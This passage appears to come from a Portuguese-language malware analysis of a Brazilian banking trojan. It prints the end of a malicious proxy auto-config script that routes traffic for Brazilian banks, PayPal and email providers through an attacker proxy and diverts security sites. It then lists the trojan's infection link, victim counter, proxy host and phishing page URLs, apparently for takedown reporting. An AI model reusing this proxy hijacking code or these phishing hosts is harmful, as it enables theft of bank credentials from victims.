{ return ip; }; if (shExpMatch(host, santa3)) { return ip; }; var sic1 = '*sicredi*'; if (shExpMatch(host, sic1)) { return ip; }; var ita1 = '*itau*'; if (shExpMatch(host, ita1)) { return ip; }; var bnb1 = '*bnb*'; if (shExpMatch(host, bnb1)) { return ip; }; var saf1 = '*safra*'; if (shExpMatch(host, saf1)) { return ip; }; var corta1 = '*banrisul*'; if (shExpMatch(host, corta1)) { return ip; }; var muki1 = '*citibank*'; if (shExpMatch(host, muki1)) { return ip; }; var cete1 = '*cetelem*'; if (shExpMatch(host, cete1)) { return ip; }; var pag1 = '*pagseguro*'; if (shExpMatch(host, pag1)) { return ip; }; var int1 = '*intouch*'; if (shExpMatch(host, int1)) { return ip; }; var info1 = '*infoseg*'; if (shExpMatch(host, info1)) { return ip; }; var ser1 = '*serasa*'; if (shExpMatch(host, ser1)) { return ip; }; var am1 = '*american*'; if (shExpMatch(host, am1)) { return ip; }; var pay1 = '*paypal*'; if (shExpMatch(host, pay1)) { return ip; }; var ld1 = '*linhadefensiva*'; if (shExpMatch(host, ld1)) { return google['com']['br']; }; var ssl1 = '*securessl*'; if (shExpMatch(host, ssl1)) { return google['com']['br']; }; var gma = '*gmail*'; if (shExpMatch(host, bb1)) { return ip; }; var tam = '*tam.com*'; if (shExpMatch(host, bb1)) { return ip; }; return 'DIRECT'; }; *Detalhes da infecção: Configura um endereço proxy no navegador Faz acesso a um site que provavelmente registra o contador de vítimas http://vks11467.ip-3...OME_COMPUTADOR% * Fontes/ Links para serem reportados: * Link informado http://avisos2.foto-brasil-host.info/ * Contador http://vks11467.ip-3...OME_COMPUTADOR% * Proxy mim.xxx.eu * Sites phishing Santander http://mim.xxx.eu/juntos/ Banco do Brasil http://mim.xxx.eu/aapfs/ Banese http://mim.xxx.eu/home/banese/ Caixa http://mim.xxx.eu/home/caixa/ Bradesco http://mim.xxx.eu/home/bradesco/ HSBC http://mim.xxx.eu/home/home/HSBC/ Hotmail http://mim.xxx.eu/hotmail/login.srf.html Sicredi http://mim.xxx.eu/sic/ Itaú http://mim.xxx.eu/GRlPNET/ BNB http://mim.xxx.eu/home/bnb/ Citibank http://mim.xxx.eu/home/citibank/ Serasa http://mim.xxx.eu/home/serasa/ American Express http://mim.xxx.eu/home/br/ Gmail http://mim.xxx.eu/mail/ * Bankerfix: Arquivos serão removidos na próxima atualização.